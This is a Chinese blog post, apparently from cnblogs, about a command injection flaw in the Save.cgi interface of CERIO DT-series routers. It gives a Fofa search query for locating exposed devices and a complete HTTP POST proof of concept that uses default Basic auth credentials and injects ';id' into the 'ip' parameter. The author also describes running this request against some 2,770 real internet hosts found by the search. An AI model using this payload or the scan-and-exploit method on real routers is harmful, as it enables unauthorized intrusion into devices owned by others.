首页 > 其他分享 >CERIO-DT系列路由器Save.cgi接口存在命令执行漏洞

CERIO-DT系列路由器Save.cgi接口存在命令执行漏洞

时间:2024-05-19 10:41:45浏览次数:18  
标签:cgi title CERIO 命令 DT 执行 id

漏洞描述:

由于未经过过滤和适当限制的情况下,传入的参数直接用于构建并执行系统命令,攻击者通过将恶意命令注入到"Save.cgi"接口的请求参数中可以执行任意命令。

Fofa:

title="DT-100G-N" || title="DT-300N" || title="DT-100G" || title="AMR-3204G" || title="WMR-200N"

POC:

POST /cgi-bin/Save.cgi?cgi=PING HTTP/1.1
Host: 
Authorization: Basic b3BlcmF0b3I6MTIzNA==
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 33

pid=2061&ip=127.0.0.1;id&times=1

漏洞复现

在fofa中搜索资产,共有2770条数据匹配

image-20240519093625380

将匹配数据进行导出整理,使用burp抓包构造数据包,对Host进行爆破

image-20240519102950103

所有的ip均可以执行id命令,该漏洞的描述是可以执行任意命令,尝试执行whoami,ls,set,echo…等命令,返回均为执行id命令的内容

image-20240519103011612

尝试对命令进行编码或使用其他命令分隔符,也使用了完整路径的方式,但依旧无法注入

image-20240519103026687

所有尝试修改的命令返回的都是执行'id'命令, 很可能后台处理脚本对输入进行了严格的过滤或者特定的解析,只允许执行预定义的某些命令,或者在监测到师徒执行其他命令时默认执行'id'

标签:cgi,title,CERIO,命令,DT,执行,id
From: https://www.cnblogs.com/LeouMaster/p/18200106

相关文章

  • CERIO-DT系列路由器Save.cgi接口存在命令执行漏洞
    漏洞描述:由于未经过过滤和适当限制的情况下,传入的参数直接用于构建并执行系统命令,攻击者通过将恶意命令注入到"Save.cgi"接口的请求参数中可以执行任意命令。Fofa:title="DT-100G-N"||title="DT-300N"||title="DT-100G"||title="AMR-3204G"||title="WMR-200N"POC:PO......
  • Equality in OOP and ADT
    在现实物理世界中,任何对象都是不相等的但是对于人类语言,或者对于数学世界,完全可以有很多相同的东西,例如√9和3表现了相等的数值,我们完全可以认为两者是相同的那么在软件世界中,Java的==和equals()有什么区别?在很多场景下,需要判定两个对象是否“相等”,例如:判断某个Collectio......
  • WDS+MDT网络启动自动部署windows(二十二)MDT高级任务序列
    简介我就是想窝在自己的工位,不想出现场。如何把MDT,安装系统,最大化的利用起来?那么我们要考虑三种常见工作状况,一种不常见工作状况。核心设置 SkipUserData=YES,可以设置在RULES中,customsettings.ini文件中。数据库设置,是优先于RULES的。全新安装-不保存数据啥也不保留了,重新......
  • rockchip uboot 应用dts overlays
    提供一种基于rkSDKbuildroot使用dtbo的方法简单说明:uboot中默认加载default-dtb-overlay.dtboapp/dtbo-tools/S03checkDTBO开机检查拨码开关,并将/boot/overlays/default-dtb-overlay.dtbo链接到目标dtbo,有效的dtbo名全部存放于dtbo_table变量中build.sh中:新增dtbo编译选项......
  • pandas读取CSV文件时出现警告:DtypeWarning: Columns (2) have mixed types. Specify d
    问题描述:用pandas清洗数据时发现爆出告警,且清洗出来的数据大小格式不对DtypeWarning:Columns(2)havemixedtypes.Specifydtypeoptiononimportorsetlow_memory=False意思是第二列出现类型混乱,原因如下pandas读取csv文件默认是按块读取的,即不一次性全部读取;另外pand......
  • 一个有趣的想法,没有fastcgi的php-fpm之前,php的框架是什么的?
    2024年5月14日10:14:47cgi规范https://www.rfc-editor.org/rfc/rfc3875w3chttps://www.w3.org/CGI/fastcgi细节说明https://www.mit.edu/~yandros/doc/specs/fcgi-spec.htmlSAPI的全称是ServerApplicationProgrammingInterface就是服务器应用程序接口PHP的SAPI模块方......
  • WDS+MDT网络启动自动部署windows(十九)MDT replace任务序列
    简介MDT的默认任务序列有很多个,我们不能只盯着标准客户序列啊, 不管用不用,我替你们测试一下replace upgrade两个标准序列。sysprepandcapture,这个是做胖镜像的,终端机祛除各种信息,然后抓镜像回来的,介绍的很多,就不讲了。测试replace任务序列 我将随意安装两个软件,并用两......
  • WDS+MDT网络启动自动部署windows(二十)MDT upgrade任务序列
    WDS+MDT网络启动自动部署windows(十九)MDTreplace任务序列 简介#MDT的默认任务序列有很多个,我们不能只盯着标准客户序列啊, 不管用不用,我替你们测试一下replace upgrade两个标准序列。sysprepandcapture,这个是做胖镜像的,终端机祛除各种信息,然后抓镜像回来的,介绍的很多......
  • WDS+MDT网络启动自动部署windows(十八)MDT 移动OU组织单位
    简介加入域时,如果计算机已存在,且OU设置不一致,可能会导致计算机孤立。使用Windows10(Windows10)刷新Windows7计算机-Windows10|Microsoft学习在刷新过程中,部署共享规则中指定的域加入详细信息将用于将计算机重新加入域。如果Windows7客户端在与MachineObjectOU指......
  • PHP-FPM(FastCGI Process Manager)处理请求的流程
    PHP-FPM(FastCGIProcessManager)处理请求的流程大致遵循以下步骤,其中您提到的几个关键函数和阶段是PHP-FPM生命周期中的重要组成部分。下面是对您提到步骤的解释及它们如何在PHP-FPM中执行的概述:1.**php_module_startup**:-这个阶段发生在PHP-FPM服务启动时,而非每次请求处理......